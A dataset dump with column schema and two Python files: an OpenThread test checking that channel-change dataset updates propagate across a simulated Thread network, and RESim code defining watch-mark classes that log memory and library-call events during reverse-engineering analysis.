Dataset schema (column: type, observed range):

blob_id: string, length 40 to 40
directory_id: string, length 40 to 40
path: string, length 4 to 721
content_id: string, length 40 to 40
detected_licenses: list, length 0 to 57
license_type: string, 2 classes
repo_name: string, length 5 to 91
snapshot_id: string, length 40 to 40
revision_id: string, length 40 to 40
branch_name: string, 321 classes
visit_date: timestamp[ns], 2016-08-12 09:31:09 to 2023-09-06 10:45:07
revision_date: timestamp[ns], 2010-09-28 14:01:40 to 2023-09-06 06:22:19
committer_date: timestamp[ns], 2010-09-28 14:01:40 to 2023-09-06 06:22:19
github_id: int64, 426 to 681M
star_events_count: int64, 101 to 243k
fork_events_count: int64, 0 to 110k
gha_license_id: string, 23 classes
gha_event_created_at: timestamp[ns], 2012-06-28 18:51:49 to 2023-09-14 21:59:16 (nullable)
gha_created_at: timestamp[ns], 2008-02-11 22:55:26 to 2023-08-10 11:14:58 (nullable)
gha_language: string, 147 classes
src_encoding: string, 26 classes
language: string, 2 classes
is_vendor: bool, 2 classes
is_generated: bool, 2 classes
length_bytes: int64, 6 to 10.2M
extension: string, 115 classes
filename: string, length 3 to 113
content: string, length 6 to 10.2M
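Each row below pairs repository metadata with the full text of one source file. A minimal sketch of how such a table could be consumed, assuming it is published as a Hugging Face `datasets` dataset ("user/dataset-name" and the "train" split are placeholders, not real identifiers):

```
# Minimal sketch, assuming this table is available as a Hugging Face dataset;
# "user/dataset-name" and the "train" split are assumptions, not actual names.
from datasets import load_dataset

ds = load_dataset("user/dataset-name", split="train", streaming=True)

for row in ds:
    # Keep small, permissively licensed Python files and read their content.
    if (row["license_type"] == "permissive"
            and row["language"] == "Python"
            and row["length_bytes"] < 10_000):
        print(row["repo_name"], row["path"], row["length_bytes"])
        source = row["content"]  # full file text as a string
```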
blob_id: 49963aa42eca0c8863f99f8888c7d9229730ffd2
directory_id: 7bc1d8634529eac952490399fb71f10bcedf05cc
path: /tests/scripts/thread-cert/test_dataset_updater.py
content_id: ba3bc9f13861baee0e942a912d33e08fc3157ea2
detected_licenses: ["LicenseRef-scancode-warranty-disclaimer", "BSD-3-Clause"]
license_type: permissive
repo_name: openthread/openthread
snapshot_id: 6a9e25d1cd224bde9796d9616f04f423dba27d77
revision_id: 102a631cb3f8938389d0d10199a14c59184039cd
branch_name: refs/heads/main
visit_date: 2023-08-18T10:46:03.820124
revision_date: 2023-08-17T22:20:55
committer_date: 2023-08-17T22:20:55
github_id: 55,808,787
star_events_count: 3,485
fork_events_count: 1,296
gha_license_id: BSD-3-Clause
gha_event_created_at: 2023-09-14T15:50:53
gha_created_at: 2016-04-08T20:47:41
gha_language: C++
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 4,104
extension: py
filename: test_dataset_updater.py
content:
#!/usr/bin/env python3
#
# Copyright (c) 2021, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
import config
import thread_cert
LEADER = 1
ROUTER = 2
MED = 3
SED = 4
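# Topology under test: LEADER and ROUTER form the mesh on channel 11, while
# MED (minimal end device) and SED (sleepy end device) attach through ROUTER.
# The test verifies that a dataset update changing the channel, initiated from
# either the leader or a router, propagates to every node, and that a later
# update overrides one still in progress.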
class TestDatasetUpdater(thread_cert.TestCase):
SUPPORT_NCP = False
USE_MESSAGE_FACTORY = False
TOPOLOGY = {
LEADER: {
'mode': 'rdn',
'channel': 11,
},
ROUTER: {
'mode': 'rdn',
'channel': 11,
},
MED: {
'mode': 'rn',
'channel': 11,
'allowlist': [ROUTER],
},
SED: {
'mode': '-',
'channel': 11,
'timeout': config.DEFAULT_CHILD_TIMEOUT,
'allowlist': [ROUTER],
},
}
def test(self):
self.nodes[LEADER].start()
self.simulator.go(config.LEADER_STARTUP_DELAY)
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
self.nodes[ROUTER].start()
self.simulator.go(config.ROUTER_STARTUP_DELAY)
self.assertEqual(self.nodes[ROUTER].get_state(), 'router')
self.nodes[MED].start()
self.simulator.go(5)
self.assertEqual(self.nodes[MED].get_state(), 'child')
self.nodes[SED].start()
self.simulator.go(5)
self.assertEqual(self.nodes[SED].get_state(), 'child')
self.verify_state(11)
# update initiated by LEADER
self.nodes[LEADER].start_dataset_updater(channel=12)
self.simulator.go(120)
self.verify_state(12)
# update initiated by ROUTER
self.nodes[ROUTER].start_dataset_updater(channel=13)
self.simulator.go(120)
self.verify_state(13)
# update initiated by LEADER overridden by ROUTER
self.nodes[LEADER].start_dataset_updater(channel=14)
self.simulator.go(20)
self.nodes[ROUTER].start_dataset_updater(channel=15)
self.simulator.go(120)
self.verify_state(15)
# update initiated by ROUTER overridden by LEADER
self.nodes[ROUTER].start_dataset_updater(channel=16)
self.simulator.go(10)
self.nodes[LEADER].start_dataset_updater(channel=17)
self.simulator.go(120)
self.verify_state(17)
def verify_state(self, channel):
self.assertEqual(self.nodes[LEADER].get_channel(), channel)
self.assertEqual(self.nodes[ROUTER].get_channel(), channel)
self.assertEqual(self.nodes[MED].get_channel(), channel)
self.assertEqual(self.nodes[SED].get_channel(), channel)
if __name__ == '__main__':
unittest.main()
blob_id: 894b6dbb3db197cfedf462f6e8b299e95589eb00
directory_id: daa60221ed36dc8e20dd0a2a96521ffa2bdc94c5
path: /simics/monitorCore/watchMarks.py
content_id: 50b2906a087a2a66a6735ee385ccc93addecea0f
detected_licenses: ["BSD-2-Clause"]
license_type: permissive
repo_name: mfthomps/RESim
snapshot_id: 7dbddc1d46653c0443dec9c7930517753bbe5e78
revision_id: cc83ed799cd37934e1659e1d20abf6c36449e0bf
branch_name: refs/heads/master
visit_date: 2023-08-10T04:27:36.365806
revision_date: 2023-06-29T15:22:55
committer_date: 2023-06-29T15:22:55
github_id: 183,653,459
star_events_count: 160
fork_events_count: 30
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 53,929
extension: py
filename: watchMarks.py
content:
from simics import Sim_Trans_Load
import pickle
import json
import os
import sys
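# Each *Mark class below records one observed data-watch event (a system call,
# copy, compare, string operation, and so on) and renders a human readable
# description via getMsg(). The WatchMarks class near the end of the file
# collects these marks and handles display, reset, and serialization.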
class CallMark():
def __init__(self, msg, max_len, recv_addr, length, fd, is_lib=False):
if recv_addr is not None:
if max_len is not None:
self.msg = '%s addr: 0x%x length: %d max_len: %d' % (msg, recv_addr, length, max_len)
else:
self.msg = '%s addr: 0x%x length: %d' % (msg, recv_addr, length)
else:
self.msg = msg
self.max_len = max_len
self.recv_addr = recv_addr
self.len = length
self.fd = fd
self.is_lib = is_lib
def getMsg(self):
return self.msg
class CopyMark():
def __init__(self, src, dest, length, buf_start, op_type, strcpy=False, sp=None, truncated=None):
self.src = src
self.dest = dest
self.length = length
self.buf_start = buf_start
self.op_type = op_type
self.strcpy = strcpy
self.sp = sp
if op_type == Sim_Trans_Load:
if buf_start is not None:
offset = src - buf_start
trunc_string = ''
if truncated is not None:
trunc_string = ' (truncated from %d)' % truncated
self.msg = 'Copy %d bytes%s from 0x%08x to 0x%08x . (from offset %d into buffer at 0x%x)' % (length, trunc_string, src, dest, offset, buf_start)
else:
self.msg = 'Copy %d bytes from 0x%x to 0x%08x . (Source buffer starts before known buffers!)' % (length, src, dest)
else:
if buf_start is not None:
if dest == buf_start:
self.msg = 'Modify Copy %d bytes from 0x%08x to 0x%08x . (to start of buffer at 0x%x)' % (length, src, dest, buf_start)
else:
offset = dest - buf_start
self.msg = 'Modify Copy %d bytes from 0x%08x to 0x%08x . (to offset %d into buffer at 0x%x)' % (length, src, dest, offset, buf_start)
elif length is not None:
self.msg = 'Modify Copy %d bytes from 0x%08x to 0x%08x (buffer unknown!)' % (length, src, dest)
else:
self.msg = 'Modify Copy: length is None and destination buffer is unknown'
def getMsg(self):
return self.msg
class SetMark():
def __init__(self, dest, length, buf_start, lgr):
self.dest = dest
self.length = length
self.buf_start = buf_start
if buf_start is not None:
offset = dest - buf_start
self.msg = 'memset %d bytes starting 0x%x (offset %d into buffer at 0x%x)' % (length, dest, offset, buf_start)
else:
offset = 0
self.msg = 'memset %d bytes starting 0x%x **Not a known buffer' % (length, dest)
lgr.debug(self.msg)
def getMsg(self):
return self.msg
class DataMark():
def __init__(self, addr, start, length, cmp_ins, trans_size, lgr, modify=False, ad_hoc=False, dest=None, sp=None, note=None, value=None):
self.lgr = lgr
self.addr = addr
''' offset into the buffer starting at start '''
if addr is not None:
self.offset = addr - start
else:
self.offset = None
''' start is the start of the accessed buffer '''
self.start = start
''' length of the accessed buffer '''
self.length = length
self.cmp_ins = cmp_ins
''' only used if multiple iterations, or ad-hoc data copy. reflects the last address read from.'''
if ad_hoc:
self.end_addr = addr+trans_size-1
#self.lgr.debug('DataMark ad_hoc end_addr is now 0x%x' % self.end_addr)
else:
self.end_addr = None
self.loop_count = 0
self.modify = modify
self.ad_hoc = ad_hoc
self.trans_size = trans_size
self.dest = dest
self.sp = sp
self.note = note
self.value = value
''' keep value after a reset '''
self.was_ad_hoc = False
#self.lgr.debug('DataMark addr 0x%x start 0x%x length %d, offset %d' % (addr, start, length, self.offset))
def getMsg(self):
if self.start is None:
mark_msg = 'Error getting mark message'
elif self.modify and self.addr is not None:
mark_msg = 'Write %d to 0x%08x offset %4d into 0x%08x (buf size %4d)' % (self.trans_size, self.addr, self.offset, self.start, self.length)
elif self.addr is None:
mark_msg = 'Memory mod reset, original buffer %d bytes starting at 0x%x' % (self.length, self.start)
elif self.end_addr is None:
offset_string = ''
if self.offset != 0 or self.trans_size != self.length:
offset_string = 'offset %4d into 0x%08x (buf size %4d)' % (self.offset, self.start, self.length)
if self.note is None:
mark_msg = 'Read %d from 0x%08x %s %s' % (self.trans_size, self.addr, offset_string, self.cmp_ins)
else:
mark_msg = '%s %d bytes into dest 0x%08x from 0x%08x %s %s' % (self.note, self.trans_size, self.dest, self.addr, offset_string, self.cmp_ins)
elif self.ad_hoc or self.was_ad_hoc:
copy_length = (self.end_addr - self.addr) + 1
#self.lgr.debug('DataMark getMsg ad-hoc length is %d' % copy_length)
if self.start is not None:
if copy_length == self.length and self.start == self.addr:
mark_msg = 'Copy %d bytes from 0x%08x to 0x%08x . Ad-hoc' % (copy_length, self.addr, self.dest)
else:
offset = self.addr - self.start
mark_msg = 'Copy %d bytes from 0x%08x to 0x%08x . Ad-hoc (from offset %d into buffer at 0x%x)' % (copy_length, self.addr, self.dest, offset, self.start)
else:
mark_msg = 'Copy %d bytes from 0x%08x to 0x%08x . Ad-hoc (Source buffer starts before known buffers!)' % (copy_length, self.addr, self.dest)
else:
copy_length = self.end_addr- self.addr + 1
mark_msg = 'Iterate %d times over 0x%08x-0x%08x (%d bytes) starting offset %4d into 0x%8x (buf size %4d) %s' % (self.loop_count, self.addr,
self.end_addr, copy_length, self.offset, self.start, self.length, self.cmp_ins)
return mark_msg
def addrRange(self, addr):
self.end_addr = addr
self.loop_count += 1
#self.lgr.debug('DataMark addrRange end_addr now 0x%x loop_count %d' % (self.end_addr, self.loop_count))
def noAdHoc(self):
if self.ad_hoc:
self.was_ad_hoc = True
self.ad_hoc = False
class KernelMark():
def __init__(self, addr, count, callnum, fd):
self.addr = addr
self.count = count
self.callnum = callnum
self.fd = fd
self.msg = 'Kernel read %d bytes from 0x%x call_num: %d FD: %d' % (count, addr, callnum, fd)
def getMsg(self):
return self.msg
class KernelModMark():
def __init__(self, addr, count, callnum, fd):
self.addr = addr
self.count = count
self.callnum = callnum
self.fd = fd
self.msg = 'Kernel overwrote %d bytes from 0x%x call_num: %d FD: %d' % (count, addr, callnum, fd)
def getMsg(self):
return self.msg
class CompareMark():
def __init__(self, fun, ours, theirs, count, src_str, dest_str, buf_start):
self.src_str = src_str
self.dst_str = dest_str
self.fun = fun
self.ours = ours
self.theirs = theirs
self.count = count
if buf_start is not None:
offset = ours - buf_start
self.msg = '%s 0x%x %s (%d bytes into buffer at 0x%x) to %s (at 0x%x, %d bytes)' % (fun, ours, src_str, offset, buf_start, dest_str, theirs, count)
else:
self.msg = '%s 0x%x %s (unknown buffer) to %s (at 0x%x, %d bytes)' % (fun, ours, src_str, dest_str, theirs, count)
def getMsg(self):
return self.msg
class StrChrMark():
def __init__(self, start, the_chr, count):
self.the_chr = the_chr
self.start = start
self.count = count
if self.the_chr > 20 and self.the_chr < 256:
self.msg = 'strchr in string at 0x%x find 0x%x(%s) ' % (start, self.the_chr, chr(self.the_chr))
else:
self.msg = 'strchr in string at 0x%x find 0x%x' % (start, self.the_chr)
def getMsg(self):
return self.msg
class StrtousMark():
def __init__(self, fun, src):
self.src = src
self.msg = '%s at 0x%x' % (fun, self.src)
def getMsg(self):
return self.msg
class ScanMark():
def __init__(self, src, dest, count, buf_start, sp):
self.src = src
self.dest = dest
self.count = count
self.buf_start = buf_start
self.sp = sp
if dest is None:
self.msg = 'sscanf failed to parse from 0x%x' % src
else:
self.msg = 'sscanf src 0x%x to 0x%x' % (src, dest)
def getMsg(self):
return self.msg
class XMLPropMark():
def __init__(self, src, count, the_str, result):
self.src = src
self.count = count
self.msg = 'xmlProp %s src 0x%x len %d. Prop: %s' % (the_str, src, count, result)
def getMsg(self):
return self.msg
class InetAddrMark():
def __init__(self, src, count, the_str):
self.src = src
self.count = count
self.msg = 'InetAddr %s src 0x%x len %d' % (the_str, src, count)
def getMsg(self):
return self.msg
class InetNtopMark():
def __init__(self, dest, count, the_str):
self.dest = dest
self.count = count
self.msg = 'InetNtop %s dest 0x%x len %d' % (the_str, dest, count)
def getMsg(self):
return self.msg
class LenMark():
def __init__(self, src, count):
self.src = src
self.count = count
self.msg = 'strlen src 0x%x len %d' % (src, count)
def getMsg(self):
return self.msg
class SprintfMark():
def __init__(self, fun, src, dest, count, buf_start, sp):
self.fun = fun
self.src = src
self.dest = dest
self.count = count
self.buf_start = buf_start
self.sp = sp
self.msg = '%s src: 0x%x dest 0x%x len %d' % (fun, src, dest, count)
def getMsg(self):
return self.msg
class FprintfMark():
def __init__(self, fun, src):
self.fun = fun
self.src = src
self.msg = '%s src 0x%x' % (fun, src)
def getMsg(self):
return self.msg
class FwriteMark():
def __init__(self, fun, src, count):
self.fun = fun
self.src = src
self.count = count
self.msg = '%s src 0x%x count %d' % (fun, src, count)
def getMsg(self):
return self.msg
class GlobMark():
def __init__(self, fun, src, count):
self.fun = fun
self.src = src
self.count = count
self.msg = '%s src 0x%x count %d' % (fun, src, count)
def getMsg(self):
return self.msg
class IteratorMark():
def __init__(self, fun, addr, buf_start):
self.fun = fun
self.addr = addr
if buf_start is None:
self.msg = 'iterator %s %x (no buffer start found?)' % (fun, addr)
else:
offset = addr - buf_start
self.msg = 'iterator %s %x (%d bytes into buffer at 0x%x)' % (fun, addr, offset, buf_start)
def getMsg(self):
return self.msg
class MallocMark():
def __init__(self, addr, size):
self.addr = addr
self.size = size
self.msg = 'malloc addr: 0x%x size: %d' % (addr, size)
def getMsg(self):
return self.msg
class FreeMark():
def __init__(self, addr, fun):
self.addr = addr
self.msg = '%s addr: 0x%x' % (fun, addr)
def getMsg(self):
return self.msg
class FreeXMLMark():
def __init__(self):
self.msg = 'FreeXMLDoc'
def getMsg(self):
return self.msg
class XMLParseFileMark():
def __init__(self, addr, size):
self.addr = addr
self.size = size
self.msg = 'xmlParseFile addr: 0x%x size: %d' % (addr, size)
def getMsg(self):
return self.msg
class GetTokenMark():
def __init__(self, src, dest, the_string):
self.addr = src
self.msg = 'GetToken addr: 0x%x token: %s' % (src, the_string)
def getMsg(self):
return self.msg
class StrPtr():
def __init__(self, fun, the_string):
self.msg = '%s string: %s' % (fun, the_string)
def getMsg(self):
return self.msg
class ReturnInt():
def __init__(self, fun, value):
self.msg = '%s value: %s' % (fun, value)
def getMsg(self):
return self.msg
class ResetOrigin():
def __init__(self, origin_watches, new_msg):
if new_msg is None:
self.msg = 'Reset origin with %d data watches' % len(origin_watches)
else:
self.msg = new_msg
self.origin_watches = origin_watches
def getMsg(self):
return self.msg
class LogMark():
def __init__(self, s, prefix):
self.msg = '%s : %s' % (prefix, s)
def getMsg(self):
return self.msg
class PushMark():
def __init__(self, addr, dest, buf_start, length, ip, push_size):
self.addr = addr
self.dest = dest
self.length = length
self.start = buf_start
self.ip = ip
if addr == buf_start and length == push_size:
self.msg = 'push from 0x%x to 0x%x' % (addr, dest)
else:
offset = addr - buf_start
self.msg = 'push from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x' % (addr, offset, buf_start, dest)
def getMsg(self):
return self.msg
class FGetsMark():
def __init__(self, fun, addr, dest, count, start):
self.addr = addr
self.dest = dest
self.length = count
self.start = start
if start is not None:
offset = addr - start
self.msg = 'fgets from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x' % (addr, offset, start, dest)
else:
self.msg = 'fgets from 0x%08x (unknown buffer?) to 0x%08x' % (addr, dest)
def getMsg(self):
return self.msg
class StringMark():
def __init__(self, fun, src, dest, count, start):
self.src = src
self.dest = dest
self.length = count
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x %d bytes' % (fun, src, offset, start, dest, count)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x %d bytes' % (fun, src, dest, count)
def getMsg(self):
return self.msg
class ReplaceMark():
def __init__(self, fun, src, dest, pos, length, start):
self.src = src
self.dest = dest
self.pos = pos
self.length = length
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x pos: %d, %d bytes' % (fun, src, offset, start, dest, pos, length)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x pos %d, %d bytes' % (fun, src, dest, pos, length)
def getMsg(self):
return self.msg
class AppendMark():
def __init__(self, fun, src, dest, length, start):
self.src = src
self.dest = dest
self.length = length
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x %d bytes' % (fun, src, offset, start, dest, length)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x %d bytes' % (fun, src, dest, length)
def getMsg(self):
return self.msg
class AssignMark():
def __init__(self, fun, src, dest, length, start):
self.src = src
self.dest = dest
self.length = length
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x %d bytes' % (fun, src, offset, start, dest, length)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x %d bytes' % (fun, src, dest, length)
def getMsg(self):
return self.msg
class CharLookupMark():
def __init__(self, addr, stuff, length):
self.addr = addr
self.end_addr = addr
self.length = length
self.stuff = stuff
def extend(self):
self.end_addr = self.end_addr+1
def getMsg(self):
if self.length is not None:
length = self.length
else:
length = self.end_addr - self.addr
msg = 'Char Lookup buffer at 0x%x len %d, %s' % (self.addr, length, self.stuff)
return msg
class CharPtrMark():
def __init__(self, addr, ptr, value):
self.addr = addr
self.ptr = ptr
self.value = value
def getMsg(self):
msg = 'Char Ptr reference at 0x%x, pointer to 0x%x value: 0x%x' % (self.addr, self.ptr, self.value)
return msg
class MscMark():
def __init__(self, fun, addr):
self.addr = addr
if addr is not None:
self.msg = '%s read 0x%x' % (fun, addr)
else:
self.msg = '%s read None' % (fun)
def getMsg(self):
return self.msg
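# WatchMarks manages the list of WatchMark records: it creates marks as events
# are observed, tracks the origin (resetting and retiring stale marks), and
# serializes marks to text, pickle, or JSON.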
class WatchMarks():
def __init__(self, top, mem_utils, cpu, cell_name, run_from_snap, lgr):
self.mark_list = []
''' Previous marks that are no longer reachable due to origin resets '''
self.stale_marks = []
self.mem_utils = mem_utils
self.cpu = cpu
self.top = top
self.cell_name = cell_name
self.lgr = lgr
self.call_cycle = None
self.prev_ip = []
self.recent_buf_address = None
self.recent_buf_max_len = None
if run_from_snap is not None:
self.loadPickle(run_from_snap)
''' SO map, to be stored along with saved json files '''
self.so_map = None
def saveMarks(self, fpath):
with open(fpath, 'w') as fh:
i = 1
for mark in self.stale_marks:
the_str = mark.mark.getMsg().encode('utf-8', 'ignore')
fh.write('%d %s ip:0x%x cycle: 0x%x\n' % (i, the_str, mark.ip, mark.cycle))
i += 1
fh.write('\n\nBegin active watch marks.\n\n')
i = 1
for mark in self.mark_list:
the_str = mark.mark.getMsg().encode('utf-8', 'ignore')
fh.write('%d %s ip:0x%x cycle: 0x%x\n' % (i, the_str, mark.ip, mark.cycle))
i += 1
def showMarks(self, old=False, verbose=False):
i = 1
if old:
for mark in self.stale_marks:
cycle = ' '
if verbose:
cycle = ' 0x%x ' % mark.cycle
print('%d%s%s ip:0x%x pid:%d' % (i, cycle, mark.mark.getMsg(), mark.ip, mark.pid))
i += 1
print('Begin active watch marks.')
elif len(self.stale_marks)>0:
print('%d stale marks not displayed. use old=True to see them.' % len(self.stale_marks))
i = 1
for mark in self.mark_list:
cycle = ' '
if verbose:
cycle = ' 0x%x ' % mark.cycle
print('%d%s%s ip:0x%x pid:%d' % (i, cycle, mark.mark.getMsg(), mark.ip, mark.pid))
i += 1
self.lgr.debug('watchMarks, showed %d marks' % len(self.mark_list))
class WatchMark():
''' Objects that are listed as watch marks -- highest level stored in mark_list'''
def __init__(self, return_cycle, call_cycle, ip, pid, mark):
self.cycle = return_cycle
self.call_cycle = call_cycle
self.ip = ip
self.pid = pid
self.mark = mark
def getJson(self, origin):
retval = {}
retval['cycle'] = self.cycle - origin
retval['ip'] = self.ip
retval['pid'] = self.pid
retval['msg'] = self.mark.getMsg()
return retval
def recordIP(self, ip):
self.prev_ip.append(ip)
if len(self.prev_ip) > 4:
self.prev_ip.pop(0)
def markCall(self, msg, max_len, recv_addr=None, length=None, fd=None, is_lib=False):
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
cm = CallMark(msg, max_len, recv_addr, length, fd, is_lib=is_lib)
cycles = self.cpu.cycles
self.addWatchMark(cm, cycles=cycles)
if recv_addr is None:
self.lgr.debug('watchMarks markCall ip: 0x%x cycles: 0x%x %s' % (ip, cycles, msg))
else:
self.lgr.debug('watchMarks markCall ip: 0x%x cycles: 0x%x %s wrote to: 0x%x' % (ip, cycles, msg, recv_addr))
if self.recent_buf_address is None:
self.recent_buf_address = recv_addr
self.recent_buf_max_len = max_len
self.recordIP(ip)
def resetOrigin(self, origin_watches, reuse_msg=False, record_old=False):
old_msg = None
if reuse_msg:
old_origin = self.getMarkFromIndex(1)
if old_origin is not None:
old_msg = old_origin.mark.getMsg()
self.clearWatchMarks(record_old=record_old)
ro = ResetOrigin(origin_watches, new_msg=old_msg)
self.addWatchMark(ro)
self.lgr.debug('watchMarks resetOrigin')
def memoryMod(self, start, length, trans_size, addr=None):
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
dm = DataMark(addr, start, length, None, trans_size, self.lgr, modify=True)
self.addWatchMark(dm)
''' DO NOT DELETE THIS LOG ENTRY, used in testing '''
self.lgr.debug('watchMarks memoryMod 0x%x msg:<%s> -- Appended, len of mark_list now %d' % (ip, dm.getMsg(), len(self.mark_list)))
def dataRead(self, addr, start, length, cmp_ins, trans_size, ad_hoc=False, dest=None, note=None, ip=None, cycles=None):
if ip is None:
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
wm = None
''' TBD generalize for loops that make multiple refs? '''
if ip not in self.prev_ip and not ad_hoc and not note:
value = self.mem_utils.readBytes(self.cpu, addr, trans_size)
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr, value=int.from_bytes(value, byteorder='little', signed=False))
wm = self.addWatchMark(dm, ip=ip, cycles=cycles)
''' DO NOT DELETE THIS LOG ENTRY, used in testing '''
self.lgr.debug('watchMarks dataRead ip: 0x%x %s appended, cycle: 0x%x len of mark_list now %d' % (ip, dm.getMsg(), self.cpu.cycles, len(self.mark_list)))
self.prev_ip = []
elif ad_hoc:
if len(self.mark_list) > 0:
pm = self.mark_list[-1]
if isinstance(pm.mark, DataMark) and pm.mark.ad_hoc and pm.mark.end_addr is not None and addr == (pm.mark.end_addr+1):
end_addr = addr + trans_size - 1
#self.lgr.debug('watchMarks dataRead extend range for add 0x%x to 0x%x' % (addr, end_addr))
pm.mark.addrRange(end_addr)
else:
#self.lgr.debug('watchMarks create new ad hoc data mark for read from 0x%x, ref buffer start 0x%x, len %d dest 0x%x, trans size %d cycle 0x%x' % (addr, start, length, dest, trans_size, self.cpu.cycles))
#sp, base = self.getStackBase(dest)
sp = self.isStackBuf(dest)
#self.lgr.debug('sp is %s' % str(sp))
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr, ad_hoc=True, dest=dest, sp=sp)
wm = self.addWatchMark(dm)
else:
self.lgr.warning('watchMarks dataRead, ad_hoc but empty mark list')
elif note is not None:
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr, note=note, dest=dest)
wm = self.addWatchMark(dm)
#self.lgr.debug('watchMarks dataRead with note ip: 0x%x %s' % (ip, dm.getMsg()))
else:
if len(self.prev_ip) > 0:
pm = self.mark_list[-1]
#self.lgr.debug('pm class is %s' % pm.mark.__class__.__name__)
if isinstance(pm.mark, DataMark):
pm.mark.addrRange(addr)
if pm.mark.ad_hoc:
#self.lgr.debug('watchMarks was add-hoc, but this is not, so reset it')
pm.mark.noAdHoc()
#self.lgr.debug('watchMarks dataRead 0x%x range 0x%x' % (ip, addr))
else:
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr)
wm = self.addWatchMark(dm, cycles=cycles)
#self.lgr.debug('watchMarks dataRead followed something other than DataMark 0x%x %s' % (ip, dm.getMsg()))
self.recordIP(ip)
return wm
def getMarkFromIndex(self, index):
index = index -1
if index < len(self.mark_list):
return self.mark_list[index]
else:
return None
def getWatchMarks(self, origin=0):
retval = []
self.lgr.debug('watchMarks getWatchMarks len is %d' % len(self.mark_list))
for mark in self.mark_list:
retval.append(mark.getJson(origin))
return retval
def isCall(self, index):
index = index -1
self.lgr.debug('watchMarks isCall type of index %d is %s' % (index, type(self.mark_list[index].mark)))
if isinstance(self.mark_list[index].mark, CallMark):
if self.mark_list[index].mark.is_lib:
return False
else:
return True
else:
return False
def getIP(self, index):
index = index-1
if index < len(self.mark_list):
#self.lgr.debug('watchMarks getCycle index %d len %s cycle: 0x%x' % (index, len(self.mark_list), self.mark_list[index].cycle))
return self.mark_list[index].ip
else:
return None
def getCycle(self, index):
index = index-1
if index < len(self.mark_list):
#self.lgr.debug('watchMarks getCycle index %d len %s cycle: 0x%x' % (index, len(self.mark_list), self.mark_list[index].cycle))
return self.mark_list[index].cycle
else:
return None
def removeRedundantDataMark(self, dest):
if len(self.prev_ip) > 0:
pm = self.mark_list[-1]
if isinstance(pm.mark, DataMark):
if pm.mark.addr == dest:
''' a copy record for the same data read previously recorded, remove the redundant data read '''
self.lgr.debug('watchMarks removeRedundantDataMark ')
del self.mark_list[-1]
def isCopyMark(self, mark):
if mark.mark.__class__.__name__ in ['CopyMark', 'StringMark', 'ReplaceMark', 'AppendMark', 'AssignMark']:
return True
else:
return False
def getMarkCopyOffset(self, address):
''' Intended for reverse data tracking. If a CopyMark is found encompassing the given address, return the
source address that corresponds to the given destination address. '''
retval = None
offset = None
ret_mark = None
cycle = self.cpu.cycles
for mark in self.mark_list:
if mark.call_cycle is not None and mark.cycle is not None and cycle >= mark.call_cycle and cycle <= mark.cycle:
if self.isCopyMark(mark):
if address >= mark.mark.dest and address <= (mark.mark.dest+mark.mark.length):
#math = mark.mark.dest+mark.mark.length
#self.lgr.debug('getMarkCopyOffset found that address 0x%x is between 0x%x len %d (0x%x)' % (address, mark.mark.dest, mark.mark.length, math))
offset = address - mark.mark.dest
retval = mark.mark.src+offset
#self.lgr.debug('and... the offset from dest is %d. The src was 0x%x, plus the offset gives 0x%x' % (offset, mark.mark.src, retval))
ret_mark = mark
else:
self.lgr.debug('watchMarks getMarkCopyOffset found cycle, but not a copy, is type %s. %s' % (mark.mark.__class__.__name__, mark.mark.getMsg()))
break
return retval, offset, ret_mark
def getCopyMark(self):
''' If currently in a copy function, return the associated mark '''
retval = None
cycle = self.cpu.cycles
for mark in self.mark_list:
if mark.cycle is None or mark.call_cycle is None:
self.lgr.debug('getCopyMark no call_cycle for mark %s' % mark)
continue
if cycle >= mark.call_cycle and cycle <= mark.cycle:
if self.isCopyMark(mark):
retval = mark
break
return retval
